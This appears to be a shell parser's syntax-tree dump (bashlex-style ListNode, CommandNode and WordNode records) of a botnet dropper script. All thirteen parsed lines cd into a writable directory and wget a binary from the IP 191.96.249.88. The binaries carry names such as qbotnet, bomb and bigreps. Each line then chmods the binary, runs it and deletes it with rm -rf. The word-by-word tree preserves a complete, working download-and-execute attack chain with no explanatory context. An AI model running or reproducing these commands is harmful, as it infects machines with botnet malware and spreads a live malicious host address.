ListNode(lineno=2, pos=(12, 133), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 97), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 97), word='http://191.96.249.88/baro'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(97, 98)),
  CommandNode(lineno=2, pos=(99, 112), parts=[
    WordNode(lineno=2, pos=(99, 104), word='chmod'),
    WordNode(lineno=2, pos=(105, 107), word='+x'),
    WordNode(lineno=2, pos=(108, 112), word='baro'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(112, 113)),
  CommandNode(lineno=2, pos=(114, 120), parts=[
    WordNode(lineno=2, pos=(114, 120), word='./baro'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(120, 121)),
  CommandNode(lineno=2, pos=(122, 133), parts=[
    WordNode(lineno=2, pos=(122, 124), word='rm'),
    WordNode(lineno=2, pos=(125, 128), word='-rf'),
    WordNode(lineno=2, pos=(129, 133), word='baro'),
  ]),
])
ListNode(lineno=3, pos=(134, 259), parts=[
  CommandNode(lineno=3, pos=(134, 141), parts=[
    WordNode(lineno=3, pos=(134, 136), word='cd'),
    WordNode(lineno=3, pos=(137, 141), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(142, 144)),
  CommandNode(lineno=3, pos=(145, 156), parts=[
    WordNode(lineno=3, pos=(145, 147), word='cd'),
    WordNode(lineno=3, pos=(148, 156), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(157, 159)),
  CommandNode(lineno=3, pos=(160, 167), parts=[
    WordNode(lineno=3, pos=(160, 162), word='cd'),
    WordNode(lineno=3, pos=(163, 167), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(168, 170)),
  CommandNode(lineno=3, pos=(171, 179), parts=[
    WordNode(lineno=3, pos=(171, 173), word='cd'),
    WordNode(lineno=3, pos=(174, 179), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(180, 182)),
  CommandNode(lineno=3, pos=(183, 187), parts=[
    WordNode(lineno=3, pos=(183, 185), word='cd'),
    WordNode(lineno=3, pos=(186, 187), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(187, 188)),
  CommandNode(lineno=3, pos=(189, 220), parts=[
    WordNode(lineno=3, pos=(189, 193), word='wget'),
    WordNode(lineno=3, pos=(194, 220), word='http://191.96.249.88/tyson'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(220, 221)),
  CommandNode(lineno=3, pos=(222, 236), parts=[
    WordNode(lineno=3, pos=(222, 227), word='chmod'),
    WordNode(lineno=3, pos=(228, 230), word='+x'),
    WordNode(lineno=3, pos=(231, 236), word='tyson'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(236, 237)),
  CommandNode(lineno=3, pos=(238, 245), parts=[
    WordNode(lineno=3, pos=(238, 245), word='./tyson'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(245, 246)),
  CommandNode(lineno=3, pos=(247, 259), parts=[
    WordNode(lineno=3, pos=(247, 249), word='rm'),
    WordNode(lineno=3, pos=(250, 253), word='-rf'),
    WordNode(lineno=3, pos=(254, 259), word='tyson'),
  ]),
])
ListNode(lineno=4, pos=(260, 381), parts=[
  CommandNode(lineno=4, pos=(260, 267), parts=[
    WordNode(lineno=4, pos=(260, 262), word='cd'),
    WordNode(lineno=4, pos=(263, 267), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(268, 270)),
  CommandNode(lineno=4, pos=(271, 282), parts=[
    WordNode(lineno=4, pos=(271, 273), word='cd'),
    WordNode(lineno=4, pos=(274, 282), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(283, 285)),
  CommandNode(lineno=4, pos=(286, 293), parts=[
    WordNode(lineno=4, pos=(286, 288), word='cd'),
    WordNode(lineno=4, pos=(289, 293), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(294, 296)),
  CommandNode(lineno=4, pos=(297, 305), parts=[
    WordNode(lineno=4, pos=(297, 299), word='cd'),
    WordNode(lineno=4, pos=(300, 305), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(306, 308)),
  CommandNode(lineno=4, pos=(309, 313), parts=[
    WordNode(lineno=4, pos=(309, 311), word='cd'),
    WordNode(lineno=4, pos=(312, 313), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(313, 314)),
  CommandNode(lineno=4, pos=(315, 345), parts=[
    WordNode(lineno=4, pos=(315, 319), word='wget'),
    WordNode(lineno=4, pos=(320, 345), word='http://191.96.249.88/this'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(345, 346)),
  CommandNode(lineno=4, pos=(347, 360), parts=[
    WordNode(lineno=4, pos=(347, 352), word='chmod'),
    WordNode(lineno=4, pos=(353, 355), word='+x'),
    WordNode(lineno=4, pos=(356, 360), word='this'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(360, 361)),
  CommandNode(lineno=4, pos=(362, 368), parts=[
    WordNode(lineno=4, pos=(362, 368), word='./this'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(368, 369)),
  CommandNode(lineno=4, pos=(370, 381), parts=[
    WordNode(lineno=4, pos=(370, 372), word='rm'),
    WordNode(lineno=4, pos=(373, 376), word='-rf'),
    WordNode(lineno=4, pos=(377, 381), word='this'),
  ]),
])
ListNode(lineno=5, pos=(382, 499), parts=[
  CommandNode(lineno=5, pos=(382, 389), parts=[
    WordNode(lineno=5, pos=(382, 384), word='cd'),
    WordNode(lineno=5, pos=(385, 389), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(390, 392)),
  CommandNode(lineno=5, pos=(393, 404), parts=[
    WordNode(lineno=5, pos=(393, 395), word='cd'),
    WordNode(lineno=5, pos=(396, 404), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(405, 407)),
  CommandNode(lineno=5, pos=(408, 415), parts=[
    WordNode(lineno=5, pos=(408, 410), word='cd'),
    WordNode(lineno=5, pos=(411, 415), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(416, 418)),
  CommandNode(lineno=5, pos=(419, 427), parts=[
    WordNode(lineno=5, pos=(419, 421), word='cd'),
    WordNode(lineno=5, pos=(422, 427), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(428, 430)),
  CommandNode(lineno=5, pos=(431, 435), parts=[
    WordNode(lineno=5, pos=(431, 433), word='cd'),
    WordNode(lineno=5, pos=(434, 435), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(435, 436)),
  CommandNode(lineno=5, pos=(437, 466), parts=[
    WordNode(lineno=5, pos=(437, 441), word='wget'),
    WordNode(lineno=5, pos=(442, 466), word='http://191.96.249.88/cc7'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(466, 467)),
  CommandNode(lineno=5, pos=(468, 480), parts=[
    WordNode(lineno=5, pos=(468, 473), word='chmod'),
    WordNode(lineno=5, pos=(474, 476), word='+x'),
    WordNode(lineno=5, pos=(477, 480), word='cc7'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(480, 481)),
  CommandNode(lineno=5, pos=(482, 487), parts=[
    WordNode(lineno=5, pos=(482, 487), word='./cc7'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(487, 488)),
  CommandNode(lineno=5, pos=(489, 499), parts=[
    WordNode(lineno=5, pos=(489, 491), word='rm'),
    WordNode(lineno=5, pos=(492, 495), word='-rf'),
    WordNode(lineno=5, pos=(496, 499), word='cc7'),
  ]),
])
ListNode(lineno=6, pos=(500, 621), parts=[
  CommandNode(lineno=6, pos=(500, 507), parts=[
    WordNode(lineno=6, pos=(500, 502), word='cd'),
    WordNode(lineno=6, pos=(503, 507), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(508, 510)),
  CommandNode(lineno=6, pos=(511, 522), parts=[
    WordNode(lineno=6, pos=(511, 513), word='cd'),
    WordNode(lineno=6, pos=(514, 522), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(523, 525)),
  CommandNode(lineno=6, pos=(526, 533), parts=[
    WordNode(lineno=6, pos=(526, 528), word='cd'),
    WordNode(lineno=6, pos=(529, 533), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(534, 536)),
  CommandNode(lineno=6, pos=(537, 545), parts=[
    WordNode(lineno=6, pos=(537, 539), word='cd'),
    WordNode(lineno=6, pos=(540, 545), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(546, 548)),
  CommandNode(lineno=6, pos=(549, 553), parts=[
    WordNode(lineno=6, pos=(549, 551), word='cd'),
    WordNode(lineno=6, pos=(552, 553), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(553, 554)),
  CommandNode(lineno=6, pos=(555, 585), parts=[
    WordNode(lineno=6, pos=(555, 559), word='wget'),
    WordNode(lineno=6, pos=(560, 585), word='http://191.96.249.88/shit'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(585, 586)),
  CommandNode(lineno=6, pos=(587, 600), parts=[
    WordNode(lineno=6, pos=(587, 592), word='chmod'),
    WordNode(lineno=6, pos=(593, 595), word='+x'),
    WordNode(lineno=6, pos=(596, 600), word='shit'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(600, 601)),
  CommandNode(lineno=6, pos=(602, 608), parts=[
    WordNode(lineno=6, pos=(602, 608), word='./shit'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(608, 609)),
  CommandNode(lineno=6, pos=(610, 621), parts=[
    WordNode(lineno=6, pos=(610, 612), word='rm'),
    WordNode(lineno=6, pos=(613, 616), word='-rf'),
    WordNode(lineno=6, pos=(617, 621), word='shit'),
  ]),
])
ListNode(lineno=7, pos=(622, 739), parts=[
  CommandNode(lineno=7, pos=(622, 629), parts=[
    WordNode(lineno=7, pos=(622, 624), word='cd'),
    WordNode(lineno=7, pos=(625, 629), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(630, 632)),
  CommandNode(lineno=7, pos=(633, 644), parts=[
    WordNode(lineno=7, pos=(633, 635), word='cd'),
    WordNode(lineno=7, pos=(636, 644), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(645, 647)),
  CommandNode(lineno=7, pos=(648, 655), parts=[
    WordNode(lineno=7, pos=(648, 650), word='cd'),
    WordNode(lineno=7, pos=(651, 655), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(656, 658)),
  CommandNode(lineno=7, pos=(659, 667), parts=[
    WordNode(lineno=7, pos=(659, 661), word='cd'),
    WordNode(lineno=7, pos=(662, 667), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(668, 670)),
  CommandNode(lineno=7, pos=(671, 675), parts=[
    WordNode(lineno=7, pos=(671, 673), word='cd'),
    WordNode(lineno=7, pos=(674, 675), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(675, 676)),
  CommandNode(lineno=7, pos=(677, 706), parts=[
    WordNode(lineno=7, pos=(677, 681), word='wget'),
    WordNode(lineno=7, pos=(682, 706), word='http://191.96.249.88/for'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(706, 707)),
  CommandNode(lineno=7, pos=(708, 720), parts=[
    WordNode(lineno=7, pos=(708, 713), word='chmod'),
    WordNode(lineno=7, pos=(714, 716), word='+x'),
    WordNode(lineno=7, pos=(717, 720), word='for'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(720, 721)),
  CommandNode(lineno=7, pos=(722, 727), parts=[
    WordNode(lineno=7, pos=(722, 727), word='./for'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(727, 728)),
  CommandNode(lineno=7, pos=(729, 739), parts=[
    WordNode(lineno=7, pos=(729, 731), word='rm'),
    WordNode(lineno=7, pos=(732, 735), word='-rf'),
    WordNode(lineno=7, pos=(736, 739), word='for'),
  ]),
])
ListNode(lineno=8, pos=(740, 873), parts=[
  CommandNode(lineno=8, pos=(740, 747), parts=[
    WordNode(lineno=8, pos=(740, 742), word='cd'),
    WordNode(lineno=8, pos=(743, 747), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(748, 750)),
  CommandNode(lineno=8, pos=(751, 762), parts=[
    WordNode(lineno=8, pos=(751, 753), word='cd'),
    WordNode(lineno=8, pos=(754, 762), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(763, 765)),
  CommandNode(lineno=8, pos=(766, 773), parts=[
    WordNode(lineno=8, pos=(766, 768), word='cd'),
    WordNode(lineno=8, pos=(769, 773), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(774, 776)),
  CommandNode(lineno=8, pos=(777, 785), parts=[
    WordNode(lineno=8, pos=(777, 779), word='cd'),
    WordNode(lineno=8, pos=(780, 785), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(786, 788)),
  CommandNode(lineno=8, pos=(789, 793), parts=[
    WordNode(lineno=8, pos=(789, 791), word='cd'),
    WordNode(lineno=8, pos=(792, 793), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(793, 794)),
  CommandNode(lineno=8, pos=(795, 828), parts=[
    WordNode(lineno=8, pos=(795, 799), word='wget'),
    WordNode(lineno=8, pos=(800, 828), word='http://191.96.249.88/qbotnet'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(828, 829)),
  CommandNode(lineno=8, pos=(830, 846), parts=[
    WordNode(lineno=8, pos=(830, 835), word='chmod'),
    WordNode(lineno=8, pos=(836, 838), word='+x'),
    WordNode(lineno=8, pos=(839, 846), word='qbotnet'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(846, 847)),
  CommandNode(lineno=8, pos=(848, 857), parts=[
    WordNode(lineno=8, pos=(848, 857), word='./qbotnet'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(857, 858)),
  CommandNode(lineno=8, pos=(859, 873), parts=[
    WordNode(lineno=8, pos=(859, 861), word='rm'),
    WordNode(lineno=8, pos=(862, 865), word='-rf'),
    WordNode(lineno=8, pos=(866, 873), word='qbotnet'),
  ]),
])
ListNode(lineno=9, pos=(874, 1007), parts=[
  CommandNode(lineno=9, pos=(874, 881), parts=[
    WordNode(lineno=9, pos=(874, 876), word='cd'),
    WordNode(lineno=9, pos=(877, 881), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(882, 884)),
  CommandNode(lineno=9, pos=(885, 896), parts=[
    WordNode(lineno=9, pos=(885, 887), word='cd'),
    WordNode(lineno=9, pos=(888, 896), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(897, 899)),
  CommandNode(lineno=9, pos=(900, 907), parts=[
    WordNode(lineno=9, pos=(900, 902), word='cd'),
    WordNode(lineno=9, pos=(903, 907), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(908, 910)),
  CommandNode(lineno=9, pos=(911, 919), parts=[
    WordNode(lineno=9, pos=(911, 913), word='cd'),
    WordNode(lineno=9, pos=(914, 919), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(920, 922)),
  CommandNode(lineno=9, pos=(923, 927), parts=[
    WordNode(lineno=9, pos=(923, 925), word='cd'),
    WordNode(lineno=9, pos=(926, 927), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(927, 928)),
  CommandNode(lineno=9, pos=(929, 962), parts=[
    WordNode(lineno=9, pos=(929, 933), word='wget'),
    WordNode(lineno=9, pos=(934, 962), word='http://191.96.249.88/bigreps'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(962, 963)),
  CommandNode(lineno=9, pos=(964, 980), parts=[
    WordNode(lineno=9, pos=(964, 969), word='chmod'),
    WordNode(lineno=9, pos=(970, 972), word='+x'),
    WordNode(lineno=9, pos=(973, 980), word='bigreps'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(980, 981)),
  CommandNode(lineno=9, pos=(982, 991), parts=[
    WordNode(lineno=9, pos=(982, 991), word='./bigreps'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(991, 992)),
  CommandNode(lineno=9, pos=(993, 1007), parts=[
    WordNode(lineno=9, pos=(993, 995), word='rm'),
    WordNode(lineno=9, pos=(996, 999), word='-rf'),
    WordNode(lineno=9, pos=(1000, 1007), word='bigreps'),
  ]),
])
ListNode(lineno=10, pos=(1008, 1129), parts=[
  CommandNode(lineno=10, pos=(1008, 1015), parts=[
    WordNode(lineno=10, pos=(1008, 1010), word='cd'),
    WordNode(lineno=10, pos=(1011, 1015), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1016, 1018)),
  CommandNode(lineno=10, pos=(1019, 1030), parts=[
    WordNode(lineno=10, pos=(1019, 1021), word='cd'),
    WordNode(lineno=10, pos=(1022, 1030), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1031, 1033)),
  CommandNode(lineno=10, pos=(1034, 1041), parts=[
    WordNode(lineno=10, pos=(1034, 1036), word='cd'),
    WordNode(lineno=10, pos=(1037, 1041), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1042, 1044)),
  CommandNode(lineno=10, pos=(1045, 1053), parts=[
    WordNode(lineno=10, pos=(1045, 1047), word='cd'),
    WordNode(lineno=10, pos=(1048, 1053), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1054, 1056)),
  CommandNode(lineno=10, pos=(1057, 1061), parts=[
    WordNode(lineno=10, pos=(1057, 1059), word='cd'),
    WordNode(lineno=10, pos=(1060, 1061), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1061, 1062)),
  CommandNode(lineno=10, pos=(1063, 1093), parts=[
    WordNode(lineno=10, pos=(1063, 1067), word='wget'),
    WordNode(lineno=10, pos=(1068, 1093), word='http://191.96.249.88/gotu'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1093, 1094)),
  CommandNode(lineno=10, pos=(1095, 1108), parts=[
    WordNode(lineno=10, pos=(1095, 1100), word='chmod'),
    WordNode(lineno=10, pos=(1101, 1103), word='+x'),
    WordNode(lineno=10, pos=(1104, 1108), word='gotu'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1108, 1109)),
  CommandNode(lineno=10, pos=(1110, 1116), parts=[
    WordNode(lineno=10, pos=(1110, 1116), word='./gotu'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1116, 1117)),
  CommandNode(lineno=10, pos=(1118, 1129), parts=[
    WordNode(lineno=10, pos=(1118, 1120), word='rm'),
    WordNode(lineno=10, pos=(1121, 1124), word='-rf'),
    WordNode(lineno=10, pos=(1125, 1129), word='gotu'),
  ]),
])
ListNode(lineno=11, pos=(1130, 1251), parts=[
  CommandNode(lineno=11, pos=(1130, 1137), parts=[
    WordNode(lineno=11, pos=(1130, 1132), word='cd'),
    WordNode(lineno=11, pos=(1133, 1137), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1138, 1140)),
  CommandNode(lineno=11, pos=(1141, 1152), parts=[
    WordNode(lineno=11, pos=(1141, 1143), word='cd'),
    WordNode(lineno=11, pos=(1144, 1152), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1153, 1155)),
  CommandNode(lineno=11, pos=(1156, 1163), parts=[
    WordNode(lineno=11, pos=(1156, 1158), word='cd'),
    WordNode(lineno=11, pos=(1159, 1163), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1164, 1166)),
  CommandNode(lineno=11, pos=(1167, 1175), parts=[
    WordNode(lineno=11, pos=(1167, 1169), word='cd'),
    WordNode(lineno=11, pos=(1170, 1175), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1176, 1178)),
  CommandNode(lineno=11, pos=(1179, 1183), parts=[
    WordNode(lineno=11, pos=(1179, 1181), word='cd'),
    WordNode(lineno=11, pos=(1182, 1183), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1183, 1184)),
  CommandNode(lineno=11, pos=(1185, 1215), parts=[
    WordNode(lineno=11, pos=(1185, 1189), word='wget'),
    WordNode(lineno=11, pos=(1190, 1215), word='http://191.96.249.88/shut'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1215, 1216)),
  CommandNode(lineno=11, pos=(1217, 1230), parts=[
    WordNode(lineno=11, pos=(1217, 1222), word='chmod'),
    WordNode(lineno=11, pos=(1223, 1225), word='+x'),
    WordNode(lineno=11, pos=(1226, 1230), word='shut'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1230, 1231)),
  CommandNode(lineno=11, pos=(1232, 1238), parts=[
    WordNode(lineno=11, pos=(1232, 1238), word='./shut'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1238, 1239)),
  CommandNode(lineno=11, pos=(1240, 1251), parts=[
    WordNode(lineno=11, pos=(1240, 1242), word='rm'),
    WordNode(lineno=11, pos=(1243, 1246), word='-rf'),
    WordNode(lineno=11, pos=(1247, 1251), word='shut'),
  ]),
])
ListNode(lineno=12, pos=(1252, 1381), parts=[
  CommandNode(lineno=12, pos=(1252, 1259), parts=[
    WordNode(lineno=12, pos=(1252, 1254), word='cd'),
    WordNode(lineno=12, pos=(1255, 1259), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1260, 1262)),
  CommandNode(lineno=12, pos=(1263, 1274), parts=[
    WordNode(lineno=12, pos=(1263, 1265), word='cd'),
    WordNode(lineno=12, pos=(1266, 1274), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1275, 1277)),
  CommandNode(lineno=12, pos=(1278, 1285), parts=[
    WordNode(lineno=12, pos=(1278, 1280), word='cd'),
    WordNode(lineno=12, pos=(1281, 1285), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1286, 1288)),
  CommandNode(lineno=12, pos=(1289, 1297), parts=[
    WordNode(lineno=12, pos=(1289, 1291), word='cd'),
    WordNode(lineno=12, pos=(1292, 1297), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1298, 1300)),
  CommandNode(lineno=12, pos=(1301, 1305), parts=[
    WordNode(lineno=12, pos=(1301, 1303), word='cd'),
    WordNode(lineno=12, pos=(1304, 1305), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1305, 1306)),
  CommandNode(lineno=12, pos=(1307, 1339), parts=[
    WordNode(lineno=12, pos=(1307, 1311), word='wget'),
    WordNode(lineno=12, pos=(1312, 1339), word='http://191.96.249.88/downly'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1339, 1340)),
  CommandNode(lineno=12, pos=(1341, 1356), parts=[
    WordNode(lineno=12, pos=(1341, 1346), word='chmod'),
    WordNode(lineno=12, pos=(1347, 1349), word='+x'),
    WordNode(lineno=12, pos=(1350, 1356), word='downly'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1356, 1357)),
  CommandNode(lineno=12, pos=(1358, 1366), parts=[
    WordNode(lineno=12, pos=(1358, 1366), word='./downly'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1366, 1367)),
  CommandNode(lineno=12, pos=(1368, 1381), parts=[
    WordNode(lineno=12, pos=(1368, 1370), word='rm'),
    WordNode(lineno=12, pos=(1371, 1374), word='-rf'),
    WordNode(lineno=12, pos=(1375, 1381), word='downly'),
  ]),
])
ListNode(lineno=13, pos=(1382, 1503), parts=[
  CommandNode(lineno=13, pos=(1382, 1389), parts=[
    WordNode(lineno=13, pos=(1382, 1384), word='cd'),
    WordNode(lineno=13, pos=(1385, 1389), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1390, 1392)),
  CommandNode(lineno=13, pos=(1393, 1404), parts=[
    WordNode(lineno=13, pos=(1393, 1395), word='cd'),
    WordNode(lineno=13, pos=(1396, 1404), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1405, 1407)),
  CommandNode(lineno=13, pos=(1408, 1415), parts=[
    WordNode(lineno=13, pos=(1408, 1410), word='cd'),
    WordNode(lineno=13, pos=(1411, 1415), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1416, 1418)),
  CommandNode(lineno=13, pos=(1419, 1427), parts=[
    WordNode(lineno=13, pos=(1419, 1421), word='cd'),
    WordNode(lineno=13, pos=(1422, 1427), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1428, 1430)),
  CommandNode(lineno=13, pos=(1431, 1435), parts=[
    WordNode(lineno=13, pos=(1431, 1433), word='cd'),
    WordNode(lineno=13, pos=(1434, 1435), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1435, 1436)),
  CommandNode(lineno=13, pos=(1437, 1467), parts=[
    WordNode(lineno=13, pos=(1437, 1441), word='wget'),
    WordNode(lineno=13, pos=(1442, 1467), word='http://191.96.249.88/gzip'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1467, 1468)),
  CommandNode(lineno=13, pos=(1469, 1482), parts=[
    WordNode(lineno=13, pos=(1469, 1474), word='chmod'),
    WordNode(lineno=13, pos=(1475, 1477), word='+x'),
    WordNode(lineno=13, pos=(1478, 1482), word='gzip'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1482, 1483)),
  CommandNode(lineno=13, pos=(1484, 1490), parts=[
    WordNode(lineno=13, pos=(1484, 1490), word='./gzip'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1490, 1491)),
  CommandNode(lineno=13, pos=(1492, 1503), parts=[
    WordNode(lineno=13, pos=(1492, 1494), word='rm'),
    WordNode(lineno=13, pos=(1495, 1498), word='-rf'),
    WordNode(lineno=13, pos=(1499, 1503), word='gzip'),
  ]),
])
ListNode(lineno=14, pos=(1504, 1625), parts=[
  CommandNode(lineno=14, pos=(1504, 1511), parts=[
    WordNode(lineno=14, pos=(1504, 1506), word='cd'),
    WordNode(lineno=14, pos=(1507, 1511), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1512, 1514)),
  CommandNode(lineno=14, pos=(1515, 1526), parts=[
    WordNode(lineno=14, pos=(1515, 1517), word='cd'),
    WordNode(lineno=14, pos=(1518, 1526), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1527, 1529)),
  CommandNode(lineno=14, pos=(1530, 1537), parts=[
    WordNode(lineno=14, pos=(1530, 1532), word='cd'),
    WordNode(lineno=14, pos=(1533, 1537), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1538, 1540)),
  CommandNode(lineno=14, pos=(1541, 1549), parts=[
    WordNode(lineno=14, pos=(1541, 1543), word='cd'),
    WordNode(lineno=14, pos=(1544, 1549), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1550, 1552)),
  CommandNode(lineno=14, pos=(1553, 1557), parts=[
    WordNode(lineno=14, pos=(1553, 1555), word='cd'),
    WordNode(lineno=14, pos=(1556, 1557), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1557, 1558)),
  CommandNode(lineno=14, pos=(1559, 1589), parts=[
    WordNode(lineno=14, pos=(1559, 1563), word='wget'),
    WordNode(lineno=14, pos=(1564, 1589), word='http://191.96.249.88/bomb'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1589, 1590)),
  CommandNode(lineno=14, pos=(1591, 1604), parts=[
    WordNode(lineno=14, pos=(1591, 1596), word='chmod'),
    WordNode(lineno=14, pos=(1597, 1599), word='+x'),
    WordNode(lineno=14, pos=(1600, 1604), word='bomb'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1604, 1605)),
  CommandNode(lineno=14, pos=(1606, 1612), parts=[
    WordNode(lineno=14, pos=(1606, 1612), word='./bomb'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1612, 1613)),
  CommandNode(lineno=14, pos=(1614, 1625), parts=[
    WordNode(lineno=14, pos=(1614, 1616), word='rm'),
    WordNode(lineno=14, pos=(1617, 1620), word='-rf'),
    WordNode(lineno=14, pos=(1621, 1625), word='bomb'),
  ]),
])
